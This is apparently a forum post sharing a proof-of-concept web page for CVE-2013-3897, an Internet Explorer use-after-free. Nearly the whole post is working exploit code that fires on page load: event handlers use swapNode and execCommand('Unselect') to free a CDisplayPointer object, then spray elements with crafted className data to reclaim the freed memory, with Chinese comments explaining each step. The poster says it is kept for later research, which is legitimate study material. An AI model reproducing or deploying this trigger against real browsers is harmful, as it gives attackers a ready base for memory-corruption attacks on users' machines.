-
-
[分享]CVE-2013-3897漏洞poc
-
发表于:
2015-5-23 11:24
3018
-
<html>
<head>
<script>
var data = "";
for (i=0; i<17; i++)
{
if (i==7)
{
data += unescape("%u2020%u2030");
//data += "\u4141\u4141";
}
else
{
data += "\u4141\u4141";
}
}
data += "\u4141";
function butterfly()
{
for(i=0; i<20; i++)
{
var effect = document.createElement("div");
effect.className = data;
}
}
var battleStation = false;
var war = new Array();
var godzilla ;
var minilla ;
var battleStation = false;
function fun_onselect()
{
Math.atan2(0x999, "[*] Before swapNode");
minilla.swapNode(document.createElement("div")); // 调用swapNode,通过交换节点从页面布局删除textarea了,同时触发 onpropertychange 事件;
Math.atan2(0x999, "[*] After swapNode");
}
// fun_onpropertychange第一次被调用时是因为改变了DOM,第二次调用是由swapNode导致的,立即进行内存占位
function fun_onpropertychange()
{
Math.atan2(0x999, "[*] Enter onpropertychange");
if (battleStation == true)
{
for (i=0; i<50; i++)
{
war.push(document.createElement("span"));
}
}
Math.atan2(0x999, "[*] Before Unselect");
document.execCommand("Unselect"); // 使用了document.execCommand("Unselect")命令撤销 select ,导致了CDisplayPointer对象被释放
Math.atan2(0x999, "[*] After Unselect");
if (battleStation == true) // 对已经释放的CDisplayPointer内存进行占位
{
for (i=0; i < war.length; i++)
{
war[i].className = data;
}
}
else
{
battleStation = true;
}
Math.atan2(0x999, "[*] Leave onpropertychange");
}
function kaiju()
{
godzilla = document.createElement("textarea"); // Create a CTextArea Object
minilla = document.createElement("pre");
document.body.appendChild(godzilla);
document.body.appendChild(minilla);
godzilla.appendChild(minilla);
godzilla.onselect = fun_onselect ; // 给textarea元素设置 select 处理函数,当textarea文本框被选中时触发并调用处理函数
Math.atan2(0x999, "[*] Before godzilla.onpropertychange");
godzilla.onpropertychange = fun_onpropertychange ; // 给textarea元素设置 onpropertychange 事件处理函数,当属性变化时触发调用
Math.atan2(0x999, "[*] After godzilla.onpropertychange");
//butterfly();
Math.atan2(0x999, "[*] Before godzilla.select()");
godzilla.select(); // 主动触发 select 处理函数
Math.atan2(0x999, "[*] After godzilla.select()");
}
</script>
</head>
<body onload='kaiju()'>
</body>
</html>
链接来自
07cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4F1j5X3I4G2k6%4y4Q4x3X3g2U0L8$3#2Q4x3V1k6p5j5h3&6F1P5g2)9J5k6q4N6W2K9g2)9J5c8Y4m8Q4x3V1j5K6y4K6j5$3x3K6j5J5i4K6u0W2K9s2c8E0L8l9`.`.
先保存下来,后续更新研究分析
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
